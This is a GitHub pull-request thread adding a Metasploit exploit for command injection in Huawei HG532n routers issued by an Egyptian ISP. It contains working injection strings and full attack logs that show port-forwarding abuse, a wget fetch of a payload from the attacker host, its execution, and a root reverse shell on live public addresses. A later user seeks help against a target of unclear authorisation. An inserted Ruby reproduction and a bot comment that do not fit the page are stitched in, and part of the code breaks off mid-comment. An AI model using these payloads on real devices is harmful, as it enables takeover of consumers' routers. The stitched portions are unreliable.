Add Huawei HG532n command injection exploit #8245

Merged
merged 5 commits into from Apr 17, 2017

7 participants
@a-darwish
Contributor

a-darwish commented Apr 15, 2017

The Huawei HG532n routers, shipped by TE-Data Egypt, are vulnerable to a command injection exploit in the ping field of their limited shell interface, leading to a root shell.

TE-Data, the incumbent ISP operator in Egypt, provided this router to customers by default. A 3-day fingerprinting network scan shows around 50,000+ devices exploitable in the wild.

Affected hardware/software version strings:

  Manufacturer: Huawei Technologies Co., Ltd.
  Product Style: HG532n
  SN: B7J7SB9381703791
  IP: 192.168.1.1
  Hardware Version: HG532EAM1HG530ERRAMVER.B
  Software Version: V100R001C105B016 TEDATA

The web interface has two kinds of logins: a limited user:user login given to all customers, and an admin mode used by the company's technical staff. For machines within the TE-Data network, this web interface is remotely accessible.

The web interface's user mode provides very limited functionality, only Wi-Fi password changes and NAT port forwarding. Nonetheless, by port-forwarding the router's own (filtered) telnet port, it becomes remotely accessible.

Due to the ISP's (encrypted) runtime router configuration at /etc/defaultcfg.xml, though, the telnet daemon does not provide a direct Linux shell. Rather, a very limited custom shell is provided instead, called the "ATP command line tool". Upon disassembling this user-facing binary, it was discovered that the limited shell has a hidden ping command which falls back to the system's own shell (ping %s > /var/res_ping). We exploit that through command injection to gain Meterpreter root access:

[darwish@Home-PC]$ telnet 41.36.32.88 35000 
Trying 41.36.32.88...
Connected to 41.36.32.88.
Escape character is '^]'.
HG520b> help
Welcome to ATP command line tool.
If any question, please input "?" at the end of command.

HG520b>?
cls 
debug 
ip 
sys 
lan 
help 
save 
? 
exit 

HG520b> debug display cwmp
...
CPE OUI:00E0FC
CPE ProductClass:HG532n
CPE SerialNumber:B7J7SB9390600466
CPE Manufacture:Huawei Technologies Co., Ltd.
CPE ModelName:HG532n

HG520b> ping ?;cat${IFS}/proc/cpuinfo;true
ping: bad address '?'
system type		: Ralink RT63365 SOC
processor		: 0
cpu model		: MIPS 34K V5.5
BogoMIPS		: 332.59
wait instruction	: yes
microsecond timers	: yes
tlb_entries		: 32
extra interrupt vector	: yes
hardware watchpoint	: yes
ASEs implemented	: mips16 dsp mt
VCED exceptions		: not available
VCEI exceptions		: not available
Success
ping result:

Verification

Since this is specific to a certain hardware device, please find below PCAP captures (and an msfconsole log) for two remotely attacked routers on different Internet subnets.

huawei-hg532n-pcap-capture.zip

Also kindly check below a screenshot of the exploit + an example run when VERBOSE is set to true:

router1-exploit

$ msfconsole
msf > use exploit/linux/http/huawei_hg532n_cmdinject

msf exploit(huawei_hg532n_cmdinject) > set RHOST 197.38.98.11
RHOST => 197.38.98.11

msf exploit(huawei_hg532n_cmdinject) > set SRVHOST 41.34.32.121
SRVHOST => 41.34.32.121

msf exploit(huawei_hg532n_cmdinject) > set LHOST 41.34.32.121
LHOST => 41.34.32.121

msf exploit(huawei_hg532n_cmdinject) > set VERBOSE true
VERBOSE => true

msf exploit(huawei_hg532n_cmdinject) > exploit
[*] Exploit running as background job.
msf exploit(huawei_hg532n_cmdinject) >
[-] Handler failed to bind to 41.34.32.121:4444:-  -
[*] Started reverse TCP handler on 0.0.0.0:4444
[*] Validating router's HTTP server (197.38.98.11:80) signature
[+] Good. Router seems to be a vulnerable HG532n device
[+] Telnet port forwarding succeeded; exposted telnet port = 33552
[*] Connecting to just-exposed telnet port 33552
[+] Connection succeeded. Passing telnet credentials
[*] Received new reply token = '������
Password:'
[*] Received new reply token = 'Password:'
[+] Credentials passed; waiting for prompt 'HG520b>'
[*] Received new reply token = 'HG520b>'
[+] Prompt received. Telnet access fully granted!
[*] Starting web server; hostinig /MDGuEPiUDBRXD
[*] Using URL: http://0.0.0.0:8080/MDGuEPiUDBRXD
[*] Local IP: http://192.168.1.3:8080/MDGuEPiUDBRXD
[*] Runninig command on target: wget -g -v -l /tmp/zjtmztfz -r /MDGuEPiUDBRXD -P8080 41.34.32.121
[*] Received new reply token = 'p'
[*] Received new reply token = 'ing ?;wget${IFS}-g${IFS}-v${IFS}-l${IFS}/tmp/zjtmztfz${IFS}-r${IFS}/MDGuEPiUDBRXD${IFS}-P8080${IFS}41.34.32.121;true'
[*] Received new reply token = 'ping: bad address '?''
[+] HTTP server received request. Sending payload to victim
[*] Received new reply token = 'The IP is [41.34.32.121]'
[*] Received new reply token = 'Success
ping result:
HG520b>'
[+] Command executed succesfully
[*] Runninig command on target: chmod 777 /tmp/zjtmztfz
[*] Received new reply token = 'p'
[*] Received new reply token = 'ing ?;chmod${IFS}777${IFS}/tmp/zjtmztfz;trueping: bad address '?'

Success
ping result:
HG520b>'
[+] Command executed succesfully
[*] Runninig command on target: /tmp/zjtmztfz
[*] Received new reply token = 'p'
[*] Received new reply token = 'ing ?;/tmp/zjtmztfz&trueping: bad address '?'

Success
ping result:
HG520b>'
[+] Command executed succesfully
[*] Runninig command on target: rm /tmp/zjtmztfz
[*] Received new reply token = 'p'
[*] Received new reply token = 'ing ?;rm${IFS}/tmp/zjtmztfz;trueping: bad address '?'

Success
ping result:
HG520b>'
[+] Command executed succesfully
[*] Waiting for the payload to connect back ..
[*] Meterpreter session 1 opened (192.168.1.3:4444 -> 197.38.98.11:50097) at 2017-04-15 16:45:05 +0200
[+] Payload connected!
[*] Server stopped.

msf exploit(huawei_hg532n_cmdinject) > sessions 1
[*] Starting interaction with 1...

meterpreter > getuid
Server username: uid=0, gid=0, euid=0, egid=0
meterpreter > sysinfo
Computer     : 192.168.1.1
OS           :  (Linux 2.6.21.5)
Architecture : mips
Meterpreter  : mipsbe/linux
meterpreter >

Style

  • rubocop clean, except for the warning "Assignment Branch Condition size for <method> is too high"; the mentioned methods cannot be made any shorter.
  • msftidy clean.
  • Documentation attached in pull request documentation/modules/exploit/linux/http/huawei_hg532n_cmdinject.md
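The injection the description and the verbose log above rely on, reproduced offline as an added example (this is not the PR's module code and not Huawei's): it wraps a command in the hidden ping command with ${IFS} standing in for spaces, reassembles the telnet reply tokens until the HG520b> prompt, and aborts on error expressions found in the reply. The function names (atp_inject, wait_for_prompt, run_atp_command) are this example's own; the token streams are constructed from the logs in this thread with the documentation address 198.51.100.7 in place of the attacker host; the /Transfer timeout/ pattern is an assumed addition to the two wget patterns the reviewed module snippet uses, and the reason given for ${IFS} is an assumption, since the PR only shows that the module does it.

```ruby
# Added example; not the PR's module code. It reproduces, offline, the three
# mechanics the verbose log shows: wrapping a command in the ATP tool's hidden
# "ping" command, reassembling the telnet reply tokens until the 'HG520b>'
# prompt, and aborting on error expressions in the reply.

ATP_PROMPT = 'HG520b>'.freeze

# Error patterns per staging step. The first two wget patterns are the ones
# the reviewed module snippet uses; /Transfer timeout/ is an addition
# (assumption): a timed-out wget leaves no file behind, so stopping here is
# clearer than failing at the later chmod, which is where the Nov 2017 run in
# this thread died with "No such file or directory".
WGET_ERRORS  = [/cannot connect/, /\d+ error/, /Transfer timeout/].freeze
CHMOD_ERRORS = [/No such file/].freeze

# Wrap a shell command in the ATP "ping" command, as seen in the log:
#   ping ?      busybox ping rejects '?' ("bad address"), so no packet is sent
#   ;<command>  runs in the shell the tool hands "ping %s > /var/res_ping" to
#   ;true       leaves a zero exit status, so the tool still prints "Success"
# Spaces become ${IFS}, as the module does. Likely reason (assumption): the
# ATP tool splits its input on whitespace before formatting the ping command,
# so a literal space would truncate the injected command.
def atp_inject(command, background: false)
  if command =~ /[\r\n]/
    raise ArgumentError, 'a newline would end the ATP command line early'
  end
  sep = background ? '&' : ';' # '&' lets the tool return while the payload runs
  "ping ?;#{command.gsub(' ', '${IFS}')}#{sep}true"
end

# The socket returns the reply in arbitrary chunks ('p', then 'ing ?;...').
# Append them until the prompt ends the reply; nil means the stream ran out.
def wait_for_prompt(tokens, prompt = ATP_PROMPT)
  reply = +''
  tokens.each do |tok|
    reply << tok
    return reply if reply.rstrip.end_with?(prompt)
  end
  nil
end

# One staging step: build the line, consume the reply, classify the outcome.
# `=~` is used instead of String#match? so this also runs on Ruby < 2.4.
# Returns { sent:, status: (:ok | :error | :no_prompt), detail: }.
def run_atp_command(command, tokens, error_regexes = [], background: false)
  sent  = atp_inject(command, background: background)
  reply = wait_for_prompt(tokens)
  return { sent: sent, status: :no_prompt, detail: reply } if reply.nil?
  failed = error_regexes.find { |re| reply =~ re }
  return { sent: sent, status: :error, detail: failed } if failed
  { sent: sent, status: :ok, detail: reply }
end

# Constructed replies, modelled on the two logs in this thread (198.51.100.7
# is a documentation address standing in for the attacker host).
WGET_TIMEOUT_TOKENS = [
  'p',
  "ing ?;wget${IFS}-g${IFS}-v${IFS}-l${IFS}/tmp/x${IFS}-r${IFS}/p${IFS}-P8080${IFS}198.51.100.7;true",
  "ping: bad address '?'",
  'The IP is [198.51.100.7]',
  "wget: Transfer timeout!\n\nSuccess\nping result:\nHG520b>"
].freeze
CHMOD_NOFILE_TOKENS = [
  'p',
  "ing ?;chmod${IFS}700${IFS}/tmp/x;trueping: bad address '?'\n",
  "chmod: /tmp/x: No such file or directory\n\nSuccess\nping result:\nHG520b>"
].freeze
CHMOD_OK_TOKENS = [
  'p',
  "ing ?;chmod${IFS}700${IFS}/tmp/x;trueping: bad address '?'\n\nSuccess\nping result:\nHG520b>"
].freeze

if $PROGRAM_NAME == __FILE__
  wget = run_atp_command('wget -g -v -l /tmp/x -r /p -P8080 198.51.100.7',
                         WGET_TIMEOUT_TOKENS, WGET_ERRORS)
  puts "wget step:  #{wget[:status]} (#{wget[:detail].inspect})"
  chmod = run_atp_command('chmod 700 /tmp/x', CHMOD_OK_TOKENS, CHMOD_ERRORS)
  puts "chmod step: #{chmod[:status]}"
end
```

Running the timeout stream through the module's two wget patterns alone classifies it as :ok, which is exactly the sequence in the Nov 2017 log: the download failure goes unnoticed until chmod reports the missing file.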
# the router's busybox echo does not understand the necessary
# "-en" options. It outputs them to the binary instead.
#
# We could not also use the `wget' command stager, as Huawei

@h00die

h00die Apr 15, 2017

Contributor

This is priceless, and should also (and possibly is) captured in the docs. First suggestion was going to be to use wget stager, but you already captured why it wouldn't work. Very nice!

@a-darwish

a-darwish Apr 16, 2017

Contributor

@h00die Thanks a lot 😊😊

What would you suggest as a good place for documenting this; the module's own markdown docs? There are other Huawei-specific options beside the ones used above, so yes it's worth documenting indeed.

P.S. If this is to be merged, in another PR I can modify the wget stager to have a new opts[:huawei] option that produces the Huawei-specific wget parameters. Then in that same new PR we can modify this module to use the new wget stager ;-)

@wvu-r7

wvu-r7 Apr 17, 2017

Contributor

I think it's fine to save it for next time.

@h00die

h00die Apr 17, 2017

Contributor

I would make a section in this module's markdown docs called notes (probably the 2nd section, after vulnerable app but before commands to use the module). That will shorten the module and make it easy to see. You could then change the in-module comments to say something like "see notes in docs for additional details" so it's obvious there's info elsewhere to check.

Also up for suggestions or any other ideas.
Not every comment should be converted to the markdown docs, but some of the longer, more explanatory ones would be better there.

@a-darwish

a-darwish Apr 17, 2017

Contributor

@h00die Done. Module info hash and other comments properly abridged. Documentation file expanded (wget details, mips toolchain builds, etc.)

@wwebb-r7
Contributor

wwebb-r7 commented Apr 15, 2017

I'd suggest maybe moving most of the stuff in the info hash to the docs. Keep it somewhat along the lines of:

This module exploits an ABC vulnerability present in XYZ widgets version 123. Exploitation of this vulnerability results in remote something something in the security context of whatever-user. Other brief explanations of stuff that you feel are necessary are ok to put here as well.

Otherwise everything looks good at first glance. Do you happen to have a firmware image for this device?

@a-darwish
Contributor

a-darwish commented Apr 16, 2017

@wwebb-r7:

I'd suggest maybe moving most of the stuff in the info hash to the docs ...

Sure, will update the PR now. (Edit: done)

Otherwise everything looks good at first glance. Do you happen to have a firmware image for this device?

Yeah, /dev/mtdblock[0123] are easily extractable from all attacked devices. Using binwalk on mtdblock3 contents also produces a direct squashfs root image. I can send any of those upon request 😃

@wwebb-r7
Contributor

wwebb-r7 commented Apr 16, 2017

Nice. Email them to msfdev@metasploit.com - we prefer to test it if at all possible; however, if we find that we just don't have the time, we'll fall back on the pcap you provided.

@a-darwish
Contributor

a-darwish commented Apr 16, 2017

@wwebb-r7 commented on Apr 16, 2017, 11:50 AM GMT+3:

Nice. Email them to msfdev@metasploit.com - we prefer to test it if at all possible; however, if we find that we just don't have the time, we'll fall back on the pcap you provided.

Ok. I'm preparing a VM now for the r7 team to log into. Hosts outside the ISP network will not be able to access the target routers' port 80, so this will be a VM from within where things should work.

@busterb busterb self-assigned this Apr 17, 2017

modules/exploits/linux/http/huawei_hg532n_cmdinject.rb (outdated)
# IO redirection.
#
def execute_command(command, error_regex = nil, background: false)
print_status "Runninig command on target: #{command}"

@wvu-r7

wvu-r7 Apr 17, 2017

Contributor

This looks like a typo.

@busterb
Contributor

busterb commented Apr 17, 2017

Looks good to me, nice work. We can help make sure that the operator gets the note too.

modules/exploits/linux/http/huawei_hg532n_cmdinject.rb (outdated)
end
if res.body.include? valid_port_export_marker
print_good "Telnet port forwarding succeeded; exposted telnet port = #{external_telnet_port}"

@wvu-r7

wvu-r7 Apr 17, 2017

Contributor

Exposed?

modules/exploits/linux/http/huawei_hg532n_cmdinject.rb (outdated)
@telnet_sock.write(atp_cmd + OPT_NAOFFD + OPT_BINARY)
telnet_prompt_wait(error_regex)
print_good "Command executed succesfully"

@wvu-r7

wvu-r7 Apr 17, 2017

Contributor

Successfully?

modules/exploits/linux/http/huawei_hg532n_cmdinject.rb (outdated)
if datastore['DOWNHOST']
print_status "Will not start local web server, as DOWNHOST is already defined"
else
print_status("Starting web server; hostinig #{resource_uri}")

@wvu-r7

wvu-r7 Apr 17, 2017

Contributor

Hosting?

modules/exploits/linux/http/huawei_hg532n_cmdinject.rb (outdated)
wget_cmd = "wget -g -v -l #{output_file} -r #{payload_uri} -P#{srv_port} #{srv_host}"
execute_command(wget_cmd, [/cannot connect/, /\d+ error/]) # `404 error', etc.
execute_command("chmod 777 #{output_file}", /No such file/)
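Review bot: the wget error list on the execute_command line, `[/cannot connect/, /\d+ error/]`, does not match the "wget: Transfer timeout!" reply that the Nov 2017 run later in this thread shows being accepted as "Command executed successfully"; the failed download then only surfaces one step later as chmod's "No such file or directory". Consider adding /Transfer timeout/ to that list, or verifying the file right after the wget step (for example `execute_command("ls -l #{output_file}", /No such file/)`), so the module aborts at the step that actually failed and names the download as the cause.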

@wvu-r7

wvu-r7 Apr 17, 2017

Contributor

700 should be fine, no?

@busterb

busterb Apr 17, 2017

Contributor

yeah I presume it should

a-darwish added some commits Apr 17, 2017

huawei_hg532n_cmdinject: Use minimum permissions for staged binary
Use u+rwx permissions only, instead of full 777, while staging the
wget binary to target. As suggested by @wvu-r7 and @busterb.
modules/exploits/linux/http/huawei_hg532n_cmdinject.rb (outdated)
external_telnet_port = rand(32767) + 32768
portmapping_page = '/html/application/portmapping.asp'
url_append = "?x=InternetGatewayDevice.WANDevice.1.WANConnectionDevice.1.WANPPPConnection.1.PortMapping&RequestFile=#{portmapping_page}"

@wvu-r7

wvu-r7 Apr 17, 2017

Contributor

vars_get?

modules/exploits/linux/http/huawei_hg532n_cmdinject.rb (outdated)
res = send_request_cgi(
'method' => 'POST',
'uri' => "/html/application/del.cgi?RequestFile=#{portmapping_page}",

@wvu-r7

wvu-r7 Apr 17, 2017

Contributor

vars_get?

a-darwish added some commits Apr 17, 2017

huawei_hg532n_cmdinject: Improve overall documentation
- Add section on compiling custom binaries for the device
- Add documentation for Huawei's wget flavor (thanks @h00die)
- Abridge the module's info hash contents (thanks @wwebb-r7)
- Abridge the module's comments; reference documentation (@h00die)
huawei_hg532n_cmdinject: Use send_request_cgi() 'vars_get' key
Instead of rolling our own GET parameters implementation.

Thanks @wvu-r7!

@busterb busterb merged commit e21504b into rapid7:master Apr 17, 2017

1 check passed

continuous-integration/travis-ci/pr The Travis CI build passed

busterb pushed a commit that referenced this pull request Apr 17, 2017

@busterb
Contributor

busterb commented Apr 17, 2017

Release Notes

The exploits/linux/http/huawei_hg532n_cmdinject module has been added to the framework. It exploits Huawei HG532n routers, which as shipped by TE-Data Egypt, are vulnerable to a command injection exploit in the ping field of their limited shell interface.

@busterb busterb added the rn-exploit label Apr 17, 2017

@busterb
Contributor

busterb commented Apr 17, 2017

Thanks @a-darwish , great module and contribution.

@todb-r7 todb-r7 referenced this pull request Apr 18, 2017

Merged

Add a reference to the original PR #8262

3 of 3 tasks complete
@Boushy
Boushy commented Apr 26, 2017

[-] Exploit failed: NoMethodError undefined method `match?' for #<String:0x00000003bc3600>
always happen
screenshot - 04262017 - 06 17 01 pm

@a-darwish
Contributor

a-darwish commented Apr 27, 2017

@Boushy Update your environment to the required ruby-2.4 version where the String.match? method is defined. A simple $ bundle install should automatically do that since this is explicitly stated in the repository's .ruby-version file.

P.S. Merged pull requests are not a place for asking for help. Discuss over IRC or open an explicit Github issue ticket for that.

@wvu-r7
Contributor

wvu-r7 commented Apr 27, 2017

Great response, @a-darwish!!

@abkrenoo
abkrenoo commented Nov 18, 2017

I get this, please help:

[-] Handler failed to bind to 156.202.xxx.xxx:443:- -
[*] Started reverse TCP handler on 0.0.0.0:443
[*] Validating router's HTTP server (156.203.xxx.xxx:80) signature
msf exploit(41895) > [+] Good. Router seems to be a vulnerable HG532n device
[+] Telnet port forwarding succeeded; exposed telnet port = 34401
[*] Connecting to just-exposed telnet port 34401
[+] Connection succeeded. Passing telnet credentials
[*] Received new reply token = '������
Password:'
[*] Received new reply token = 'Password:'
[+] Credentials passed; waiting for prompt 'HG520b>'
[*] Received new reply token = 'HG520b>'
[+] Prompt received. Telnet access fully granted!
[*] Starting web server; hosting /EGcNepbLKnzPx
[*] Using URL: http://0.0.0.0:8080/EGcNepbLKnzPx
[*] Local IP: http://192.168.1.108:8080/EGcNepbLKnzPx
[*] Running command on target: wget -g -v -l /tmp/sshrqizh -r /EGcNepbLKnzPx -P8080 156.202.xx.xx
[*] Received new reply token = 'p'
[*] Received new reply token = 'ing ?;wget${IFS}-g${IFS}-v${IFS}-l${IFS}/tmp/sshrqizh${IFS}-r${IFS}/EGcNepbLKnzPx${IFS}-P8080${IFS}156.202.xxx.xx;true'
[*] Received new reply token = 'ping: bad address '?''
[*] Received new reply token = 'The IP is [156.202.xx.xxx]'
[*] Received new reply token = 'wget: Transfer timeout!

Success
ping result:
HG520b>'
[+] Command executed successfully
[*] Running command on target: chmod 700 /tmp/sshrqizh
[*] Received new reply token = 'p'
[*] Received new reply token = 'ing ?;chmod${IFS}700${IFS}/tmp/sshrqizh;trueping: bad address '?'
chmod: /tmp/sshrqizh: No such file or directory

Success
ping result:
HG520b>'
[-] Exploit aborted due to failure: unexpected-reply: Error expression (?-mix:No such file) included in reply
[*] Server stopped.

@h00die
Contributor

h00die commented Nov 18, 2017

I'm going to take a stab in the dark since you've given us little to go by (like info on the target, since you are authorized to test it and all), and haven't shown us the options...
First line, can't bind to interface.
However this is a PR, not an issue. If it's a bug post an issue, not here. If you need help learning msf use IRC where people can assist.
Do not reply here.

@abkrenoo
abkrenoo commented Nov 18, 2017

I'm sorry, I should have been more clear. The issue is in these last few lines:
——
Success
ping result:
HG520b>'
[-] Exploit aborted due to failure: unexpected-reply: Error expression (?-mix:No such file) included in reply
[*] Server stopped.
———
the router is HG532n

options:

Name             Current Setting  Required  Description
----             ---------------  --------  -----------
DOWNFILE                          no        Filename to download, (default: random)
DOWNHOST                          no        Alternative host to request the MIPS payload from
HttpPassword     user             no        Web-interface username password
HttpUsername     user             no        Valid web-interface user-mode username
ListenerTimeout  60               yes       Number of seconds to wait for the exploit to connect back
Proxies                           no        A proxy chain of format type:host:port[,type:host:port][...]
RHOST            156.203.5.yy     yes       The target address
RPORT            80               yes       The target port (TCP)
SRVHOST          156.202.32.xx    yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
SRVPORT          8080             yes       The local port to listen on.
SSL              false            no        Negotiate SSL/TLS for outgoing connections
SSLCert                           no        Path to a custom SSL certificate (default is randomly generated)
TelnetPassword   admin            no        Telnet username password
TelnetUsername   admin            no        Valid router telnet username
URIPATH                           no        The URI to use for this exploit (default is random)
VHOST                             no        HTTP server virtual host

Payload options (linux/mipsbe/meterpreter_reverse_tcp):

Name   Current Setting  Required  Description
----   ---------------  --------  -----------
LHOST  156.202.32.xx    yes       The listen address
LPORT  443              yes       The listen port

Exploit target:

Id  Name
--  ----
0   Linux mipsbe Payload

@rapid7 rapid7 locked and limited conversation to collaborators Nov 18, 2017

@wwebb-r7
Contributor

wwebb-r7 commented Nov 18, 2017

As mentioned by @h00die , this is not the place for module support. File an issue or see the IRC channel.
